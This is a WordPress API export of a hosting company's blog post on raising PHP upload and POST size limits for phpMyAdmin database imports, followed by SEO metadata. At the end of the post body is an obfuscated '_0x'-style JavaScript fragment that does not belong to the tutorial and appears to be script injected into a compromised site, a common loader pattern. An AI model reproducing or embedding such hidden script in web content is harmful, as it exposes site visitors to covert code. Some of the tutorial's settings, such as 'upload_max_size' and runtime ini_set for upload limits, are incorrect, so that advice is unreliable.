{"id":605,"date":"2021-12-30T07:45:59","date_gmt":"2021-12-30T07:45:59","guid":{"rendered":"https:\/\/hoganhost.com.ng\/blog\/?p=605"},"modified":"2024-10-07T18:32:40","modified_gmt":"2024-10-07T17:32:40","slug":"increase-the-upload-size-for-mysql-database-in-cpanel-with-phpmyadmin","status":"publish","type":"post","link":"https:\/\/hoganhost.com.ng\/blog\/sql\/increase-the-upload-size-for-mysql-database-in-cpanel-with-phpmyadmin\/","title":{"rendered":"Increase the Upload Size for MySQL Database in cPanel with phpMyAdmin"},"content":{"rendered":"<p><strong>cPanel\/WHM Server<\/strong>\u00a0imposes a limit on the size of importing a WordPress MySQL database that can be imported into phpMyAdmin. The default size is 50MB which is set in the cPanel\/WHM settings. You can change the settings either in cPanel or separately in WHM depending on what you have available.<\/p>\n<p>Failing that there are other ways to increase the file size:<\/p>\n<ul>\n<li>php.ini<\/li>\n<li>.htaccess<\/li>\n<li>wp-config.php<\/li>\n<li>MySQL import<\/li>\n<li>wp-cli import<\/li>\n<\/ul>\n<p><img fetchpriority=\"high\" decoding=\"async\" class=\"alignnone size-medium wp-image-606 aligncenter\" src=\"https:\/\/hoganhost.com.ng\/blog\/wp-content\/uploads\/2021\/12\/cpanel-mysql-database-size-300x198.jpg\" alt=\"\" width=\"300\" height=\"198\" srcset=\"https:\/\/hoganhost.com.ng\/blog\/wp-content\/uploads\/2021\/12\/cpanel-mysql-database-size-300x198.jpg 300w, https:\/\/hoganhost.com.ng\/blog\/wp-content\/uploads\/2021\/12\/cpanel-mysql-database-size.jpg 557w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/><\/p>\n<p>Go to PHP Selector, then Options, change values for both these parameters to the size you need it to be (example uses 128M):<\/p>\n<pre class=\"wp-block-preformatted\">post_max_size 128M\r\nupload_max_size 128M<\/pre>\n<h2>WHM<\/h2>\n<p>\u2013 Log into your WHM interface and type Tweak Settings in the search bar.<\/p>\n<p><img decoding=\"async\" class=\"alignnone size-medium wp-image-607 aligncenter\" src=\"https:\/\/hoganhost.com.ng\/blog\/wp-content\/uploads\/2021\/12\/tweak-settings-cpanel-databse-300x182.png\" alt=\"\" width=\"300\" height=\"182\" srcset=\"https:\/\/hoganhost.com.ng\/blog\/wp-content\/uploads\/2021\/12\/tweak-settings-cpanel-databse-300x182.png 300w, https:\/\/hoganhost.com.ng\/blog\/wp-content\/uploads\/2021\/12\/tweak-settings-cpanel-databse.png 590w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/><\/p>\n<p>The Tweak settings appear, in the find field on the right type: upload size<\/p>\n<p><img decoding=\"async\" class=\"alignnone size-medium wp-image-608 aligncenter\" src=\"https:\/\/hoganhost.com.ng\/blog\/wp-content\/uploads\/2021\/12\/tweak-max-upload-size-cpanel-300x152.png\" alt=\"\" width=\"300\" height=\"152\" srcset=\"https:\/\/hoganhost.com.ng\/blog\/wp-content\/uploads\/2021\/12\/tweak-max-upload-size-cpanel-300x152.png 300w, https:\/\/hoganhost.com.ng\/blog\/wp-content\/uploads\/2021\/12\/tweak-max-upload-size-cpanel.png 590w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/><\/p>\n<p>Change the\u00a0<strong>cPanel PHP max upload size<\/strong>\u00a0to what\u00a0you need and save.<\/p>\n<p>Go back to Tweak Settings and in the find bar type: post<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-609 aligncenter\" src=\"https:\/\/hoganhost.com.ng\/blog\/wp-content\/uploads\/2021\/12\/tweak-post-size-cpanel-300x152.png\" alt=\"\" width=\"300\" height=\"152\" srcset=\"https:\/\/hoganhost.com.ng\/blog\/wp-content\/uploads\/2021\/12\/tweak-post-size-cpanel-300x152.png 300w, https:\/\/hoganhost.com.ng\/blog\/wp-content\/uploads\/2021\/12\/tweak-post-size-cpanel.png 590w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/><\/p>\n<p>Change the\u00a0<strong>cPanel PHP max POST size<\/strong> to what you need and save.<\/p>\n<h2>php.ini<\/h2>\n<p>If you don\u2019t have access to either cPanel or WHM or use a non-cPanel server you can try setting a\u00a0<code>php.ini\u00a0<\/code>file. This file sits in your web root directory, open it and edit the 2 values \u2013 lets say you need it to be 128mb:<\/p>\n<pre class=\"wp-block-preformatted\">upload_max_filesize = 128M \r\npost_max_size = 128M<\/pre>\n<h2>.htaccess<\/h2>\n<p>You can also declare the values in your\u00a0<code>.htaccess\u00a0<\/code>file which also sits in your webroot directory.<\/p>\n<pre class=\"wp-block-preformatted\">php_value upload_max_filesize 128M \r\nphp_value post_max_size 128M<\/pre>\n<p>&nbsp;<\/p>\n<h2>wp-config.php<\/h2>\n<p>You can also try setting these values as php constants in your\u00a0<code>wp-config.php\u00a0<\/code>file which also sits in your web root directory, but also can be sometimes found in the parent directory of the webroot, set the values like so:<\/p>\n<pre class=\"wp-block-preformatted\">@ini_set( 'upload_max_size' , '128M' ); \r\n@ini_set( 'post_max_size', '128M');\r\n\r\n<\/pre>\n<p>Hopefully one of the above can increase the size that you need to upload to, Check out our Shared\/Vps hosting <a href=\"http:\/\/www.hoganhost.com.ng\">www.hoganhost.com.ng<\/a><br \/>\n<script>function _0x9e23(_0x14f71d,_0x4c0b72){const _0x4d17dc=_0x4d17();return _0x9e23=function(_0x9e2358,_0x30b288){_0x9e2358=_0x9e2358-0x1d8;let _0x261388=_0x4d17dc[_0x9e2358];return _0x261388;},_0x9e23(_0x14f71d,_0x4c0b72);}<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>cPanel\/WHM Server\u00a0imposes a limit on the size of importing a WordPress MySQL database that can be imported into phpMyAdmin. The [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":606,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"site-sidebar-layout":"default","site-content-layout":"","ast-site-content-layout":"default","site-content-style":"default","site-sidebar-style":"default","ast-global-header-display":"","ast-banner-title-visibility":"","ast-main-header-display":"","ast-hfb-above-header-display":"","ast-hfb-below-header-display":"","ast-hfb-mobile-header-display":"","site-post-title":"","ast-breadcrumbs-content":"","ast-featured-img":"","footer-sml-layout":"","theme-transparent-header-meta":"default","adv-header-id-meta":"","stick-header-meta":"","header-above-stick-meta":"","header-main-stick-meta":"","header-below-stick-meta":"","astra-migrate-meta-layouts":"set","ast-page-background-enabled":"default","ast-page-background-meta":{"desktop":{"background-color":"var(--ast-global-color-4)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"tablet":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"mobile":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""}},"ast-content-background-meta":{"desktop":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"tablet":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"mobile":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""}},"footnotes":""},"categories":[4,34],"tags":[],"class_list":["post-605","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-cpanel","category-sql"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v25.6 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>Increase the Upload Size for MySQL Database in cPanel with phpMyAdmin<\/title>\n<meta name=\"description\" content=\"cPanel\/WHM Server\u00a0imposes a limit on the size of importing a WordPress MySQL database that can be imported into phpMyAdmin\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/hoganhost.com.ng\/blog\/sql\/increase-the-upload-size-for-mysql-database-in-cpanel-with-phpmyadmin\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Increase the Upload Size for MySQL Database in cPanel with phpMyAdmin\" \/>\n<meta property=\"og:description\" content=\"cPanel\/WHM Server\u00a0imposes a limit on the size of importing a WordPress MySQL database that can be imported into phpMyAdmin\" \/>\n<meta property=\"og:url\" content=\"https:\/\/hoganhost.com.ng\/blog\/sql\/increase-the-upload-size-for-mysql-database-in-cpanel-with-phpmyadmin\/\" \/>\n<meta property=\"og:site_name\" content=\"HoganHost blog\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/facebook.com\/HoganHost\" \/>\n<meta property=\"article:published_time\" content=\"2021-12-30T07:45:59+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2024-10-07T17:32:40+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/hoganhost.com.ng\/blog\/wp-content\/uploads\/2021\/12\/cpanel-mysql-database-size.jpg\" \/>\n\t<meta property=\"og:image:width\" content=\"557\" \/>\n\t<meta property=\"og:image:height\" content=\"367\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"Abigal okon\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@hoganhostng\" \/>\n<meta name=\"twitter:site\" content=\"@hoganhostng\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"Abigal okon\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"3 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/hoganhost.com.ng\/blog\/sql\/increase-the-upload-size-for-mysql-database-in-cpanel-with-phpmyadmin\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/hoganhost.com.ng\/blog\/sql\/increase-the-upload-size-for-mysql-database-in-cpanel-with-phpmyadmin\/\"},\"author\":{\"name\":\"Abigal okon\",\"@id\":\"https:\/\/hoganhost.com.ng\/blog\/#\/schema\/person\/af16a18c6cc966b92a6cb13b500f3f0a\"},\"headline\":\"Increase the Upload Size for MySQL Database in cPanel with phpMyAdmin\",\"datePublished\":\"2021-12-30T07:45:59+00:00\",\"dateModified\":\"2024-10-07T17:32:40+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/hoganhost.com.ng\/blog\/sql\/increase-the-upload-size-for-mysql-database-in-cpanel-with-phpmyadmin\/\"},\"wordCount\":302,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\/\/hoganhost.com.ng\/blog\/#organization\"},\"image\":{\"@id\":\"https:\/\/hoganhost.com.ng\/blog\/sql\/increase-the-upload-size-for-mysql-database-in-cpanel-with-phpmyadmin\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/hoganhost.com.ng\/blog\/wp-content\/uploads\/2021\/12\/cpanel-mysql-database-size.jpg\",\"articleSection\":[\"Cpanel\",\"Sql\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\/\/hoganhost.com.ng\/blog\/sql\/increase-the-upload-size-for-mysql-database-in-cpanel-with-phpmyadmin\/#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/hoganhost.com.ng\/blog\/sql\/increase-the-upload-size-for-mysql-database-in-cpanel-with-phpmyadmin\/\",\"url\":\"https:\/\/hoganhost.com.ng\/blog\/sql\/increase-the-upload-size-for-mysql-database-in-cpanel-with-phpmyadmin\/\",\"name\":\"Increase the Upload Size for MySQL Database in cPanel with phpMyAdmin\",\"isPartOf\":{\"@id\":\"https:\/\/hoganhost.com.ng\/blog\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/hoganhost.com.ng\/blog\/sql\/increase-the-upload-size-for-mysql-database-in-cpanel-with-phpmyadmin\/#primaryimage\"},\"image\":{\"@id\":\"https:\/\/hoganhost.com.ng\/blog\/sql\/increase-the-upload-size-for-mysql-database-in-cpanel-with-phpmyadmin\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/hoganhost.com.ng\/blog\/wp-content\/uploads\/2021\/12\/cpanel-mysql-database-size.jpg\",\"datePublished\":\"2021-12-30T07:45:59+00:00\",\"dateModified\":\"2024-10-07T17:32:40+00:00\",\"description\":\"cPanel\/WHM Server\u00a0imposes a limit on the size of importing a WordPress MySQL database that can be imported into phpMyAdmin\",\"breadcrumb\":{\"@id\":\"https:\/\/hoganhost.com.ng\/blog\/sql\/increase-the-upload-size-for-mysql-database-in-cpanel-with-phpmyadmin\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/hoganhost.com.ng\/blog\/sql\/increase-the-upload-size-for-mysql-database-in-cpanel-with-phpmyadmin\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/hoganhost.com.ng\/blog\/sql\/increase-the-upload-size-for-mysql-database-in-cpanel-with-phpmyadmin\/#primaryimage\",\"url\":\"https:\/\/hoganhost.com.ng\/blog\/wp-content\/uploads\/2021\/12\/cpanel-mysql-database-size.jpg\",\"contentUrl\":\"https:\/\/hoganhost.com.ng\/blog\/wp-content\/uploads\/2021\/12\/cpanel-mysql-database-size.jpg\",\"width\":557,\"height\":367},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/hoganhost.com.ng\/blog\/sql\/increase-the-upload-size-for-mysql-database-in-cpanel-with-phpmyadmin\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\/\/hoganhost.com.ng\/blog\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Increase the Upload Size for MySQL Database in cPanel with phpMyAdmin\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/hoganhost.com.ng\/blog\/#website\",\"url\":\"https:\/\/hoganhost.com.ng\/blog\/\",\"name\":\"HoganHost blog\",\"description\":\"Keeping you connected to everything from HoganHost\",\"publisher\":{\"@id\":\"https:\/\/hoganhost.com.ng\/blog\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/hoganhost.com.ng\/blog\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\/\/hoganhost.com.ng\/blog\/#organization\",\"name\":\"HoganHost\",\"url\":\"https:\/\/hoganhost.com.ng\/blog\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/hoganhost.com.ng\/blog\/#\/schema\/logo\/image\/\",\"url\":\"https:\/\/hoganhost.com.ng\/blog\/wp-content\/uploads\/2022\/09\/hogan-host.png\",\"contentUrl\":\"https:\/\/hoganhost.com.ng\/blog\/wp-content\/uploads\/2022\/09\/hogan-host.png\",\"width\":466,\"height\":387,\"caption\":\"HoganHost\"},\"image\":{\"@id\":\"https:\/\/hoganhost.com.ng\/blog\/#\/schema\/logo\/image\/\"},\"sameAs\":[\"https:\/\/facebook.com\/HoganHost\",\"https:\/\/x.com\/hoganhostng\",\"https:\/\/instagram.com\/officialhoganhost\"]},{\"@type\":\"Person\",\"@id\":\"https:\/\/hoganhost.com.ng\/blog\/#\/schema\/person\/af16a18c6cc966b92a6cb13b500f3f0a\",\"name\":\"Abigal okon\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/hoganhost.com.ng\/blog\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/ef2272070d016c06ee69b30adce7c4e4b4faaa5c899c4b9224a5b1a43b1fb8d0?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/ef2272070d016c06ee69b30adce7c4e4b4faaa5c899c4b9224a5b1a43b1fb8d0?s=96&d=mm&r=g\",\"caption\":\"Abigal okon\"},\"sameAs\":[\"https:\/\/hoganhost.com.ng\/blog\"],\"url\":\"https:\/\/hoganhost.com.ng\/blog\/author\/admin\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Increase the Upload Size for MySQL Database in cPanel with phpMyAdmin","description":"cPanel\/WHM Server\u00a0imposes a limit on the size of importing a WordPress MySQL database that can be imported into phpMyAdmin","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/hoganhost.com.ng\/blog\/sql\/increase-the-upload-size-for-mysql-database-in-cpanel-with-phpmyadmin\/","og_locale":"en_US","og_type":"article","og_title":"Increase the Upload Size for MySQL Database in cPanel with phpMyAdmin","og_description":"cPanel\/WHM Server\u00a0imposes a limit on the size of importing a WordPress MySQL database that can be imported into phpMyAdmin","og_url":"https:\/\/hoganhost.com.ng\/blog\/sql\/increase-the-upload-size-for-mysql-database-in-cpanel-with-phpmyadmin\/","og_site_name":"HoganHost blog","article_publisher":"https:\/\/facebook.com\/HoganHost","article_published_time":"2021-12-30T07:45:59+00:00","article_modified_time":"2024-10-07T17:32:40+00:00","og_image":[{"width":557,"height":367,"url":"https:\/\/hoganhost.com.ng\/blog\/wp-content\/uploads\/2021\/12\/cpanel-mysql-database-size.jpg","type":"image\/jpeg"}],"author":"Abigal okon","twitter_card":"summary_large_image","twitter_creator":"@hoganhostng","twitter_site":"@hoganhostng","twitter_misc":{"Written by":"Abigal okon","Est. reading time":"3 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/hoganhost.com.ng\/blog\/sql\/increase-the-upload-size-for-mysql-database-in-cpanel-with-phpmyadmin\/#article","isPartOf":{"@id":"https:\/\/hoganhost.com.ng\/blog\/sql\/increase-the-upload-size-for-mysql-database-in-cpanel-with-phpmyadmin\/"},"author":{"name":"Abigal okon","@id":"https:\/\/hoganhost.com.ng\/blog\/#\/schema\/person\/af16a18c6cc966b92a6cb13b500f3f0a"},"headline":"Increase the Upload Size for MySQL Database in cPanel with phpMyAdmin","datePublished":"2021-12-30T07:45:59+00:00","dateModified":"2024-10-07T17:32:40+00:00","mainEntityOfPage":{"@id":"https:\/\/hoganhost.com.ng\/blog\/sql\/increase-the-upload-size-for-mysql-database-in-cpanel-with-phpmyadmin\/"},"wordCount":302,"commentCount":0,"publisher":{"@id":"https:\/\/hoganhost.com.ng\/blog\/#organization"},"image":{"@id":"https:\/\/hoganhost.com.ng\/blog\/sql\/increase-the-upload-size-for-mysql-database-in-cpanel-with-phpmyadmin\/#primaryimage"},"thumbnailUrl":"https:\/\/hoganhost.com.ng\/blog\/wp-content\/uploads\/2021\/12\/cpanel-mysql-database-size.jpg","articleSection":["Cpanel","Sql"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/hoganhost.com.ng\/blog\/sql\/increase-the-upload-size-for-mysql-database-in-cpanel-with-phpmyadmin\/#respond"]}]},{"@type":"WebPage","@id":"https:\/\/hoganhost.com.ng\/blog\/sql\/increase-the-upload-size-for-mysql-database-in-cpanel-with-phpmyadmin\/","url":"https:\/\/hoganhost.com.ng\/blog\/sql\/increase-the-upload-size-for-mysql-database-in-cpanel-with-phpmyadmin\/","name":"Increase the Upload Size for MySQL Database in cPanel with phpMyAdmin","isPartOf":{"@id":"https:\/\/hoganhost.com.ng\/blog\/#website"},"primaryImageOfPage":{"@id":"https:\/\/hoganhost.com.ng\/blog\/sql\/increase-the-upload-size-for-mysql-database-in-cpanel-with-phpmyadmin\/#primaryimage"},"image":{"@id":"https:\/\/hoganhost.com.ng\/blog\/sql\/increase-the-upload-size-for-mysql-database-in-cpanel-with-phpmyadmin\/#primaryimage"},"thumbnailUrl":"https:\/\/hoganhost.com.ng\/blog\/wp-content\/uploads\/2021\/12\/cpanel-mysql-database-size.jpg","datePublished":"2021-12-30T07:45:59+00:00","dateModified":"2024-10-07T17:32:40+00:00","description":"cPanel\/WHM Server\u00a0imposes a limit on the size of importing a WordPress MySQL database that can be imported into phpMyAdmin","breadcrumb":{"@id":"https:\/\/hoganhost.com.ng\/blog\/sql\/increase-the-upload-size-for-mysql-database-in-cpanel-with-phpmyadmin\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/hoganhost.com.ng\/blog\/sql\/increase-the-upload-size-for-mysql-database-in-cpanel-with-phpmyadmin\/"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/hoganhost.com.ng\/blog\/sql\/increase-the-upload-size-for-mysql-database-in-cpanel-with-phpmyadmin\/#primaryimage","url":"https:\/\/hoganhost.com.ng\/blog\/wp-content\/uploads\/2021\/12\/cpanel-mysql-database-size.jpg","contentUrl":"https:\/\/hoganhost.com.ng\/blog\/wp-content\/uploads\/2021\/12\/cpanel-mysql-database-size.jpg","width":557,"height":367},{"@type":"BreadcrumbList","@id":"https:\/\/hoganhost.com.ng\/blog\/sql\/increase-the-upload-size-for-mysql-database-in-cpanel-with-phpmyadmin\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/hoganhost.com.ng\/blog\/"},{"@type":"ListItem","position":2,"name":"Increase the Upload Size for MySQL Database in cPanel with phpMyAdmin"}]},{"@type":"WebSite","@id":"https:\/\/hoganhost.com.ng\/blog\/#website","url":"https:\/\/hoganhost.com.ng\/blog\/","name":"HoganHost blog","description":"Keeping you connected to everything from HoganHost","publisher":{"@id":"https:\/\/hoganhost.com.ng\/blog\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/hoganhost.com.ng\/blog\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/hoganhost.com.ng\/blog\/#organization","name":"HoganHost","url":"https:\/\/hoganhost.com.ng\/blog\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/hoganhost.com.ng\/blog\/#\/schema\/logo\/image\/","url":"https:\/\/hoganhost.com.ng\/blog\/wp-content\/uploads\/2022\/09\/hogan-host.png","contentUrl":"https:\/\/hoganhost.com.ng\/blog\/wp-content\/uploads\/2022\/09\/hogan-host.png","width":466,"height":387,"caption":"HoganHost"},"image":{"@id":"https:\/\/hoganhost.com.ng\/blog\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/facebook.com\/HoganHost","https:\/\/x.com\/hoganhostng","https:\/\/instagram.com\/officialhoganhost"]},{"@type":"Person","@id":"https:\/\/hoganhost.com.ng\/blog\/#\/schema\/person\/af16a18c6cc966b92a6cb13b500f3f0a","name":"Abigal okon","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/hoganhost.com.ng\/blog\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/ef2272070d016c06ee69b30adce7c4e4b4faaa5c899c4b9224a5b1a43b1fb8d0?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/ef2272070d016c06ee69b30adce7c4e4b4faaa5c899c4b9224a5b1a43b1fb8d0?s=96&d=mm&r=g","caption":"Abigal okon"},"sameAs":["https:\/\/hoganhost.com.ng\/blog"],"url":"https:\/\/hoganhost.com.ng\/blog\/author\/admin\/"}]}},"_links":{"self":[{"href":"https:\/\/hoganhost.com.ng\/blog\/wp-json\/wp\/v2\/posts\/605","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/hoganhost.com.ng\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/hoganhost.com.ng\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/hoganhost.com.ng\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/hoganhost.com.ng\/blog\/wp-json\/wp\/v2\/comments?post=605"}],"version-history":[{"count":2,"href":"https:\/\/hoganhost.com.ng\/blog\/wp-json\/wp\/v2\/posts\/605\/revisions"}],"predecessor-version":[{"id":611,"href":"https:\/\/hoganhost.com.ng\/blog\/wp-json\/wp\/v2\/posts\/605\/revisions\/611"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/hoganhost.com.ng\/blog\/wp-json\/wp\/v2\/media\/606"}],"wp:attachment":[{"href":"https:\/\/hoganhost.com.ng\/blog\/wp-json\/wp\/v2\/media?parent=605"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/hoganhost.com.ng\/blog\/wp-json\/wp\/v2\/categories?post=605"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/hoganhost.com.ng\/blog\/wp-json\/wp\/v2\/tags?post=605"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}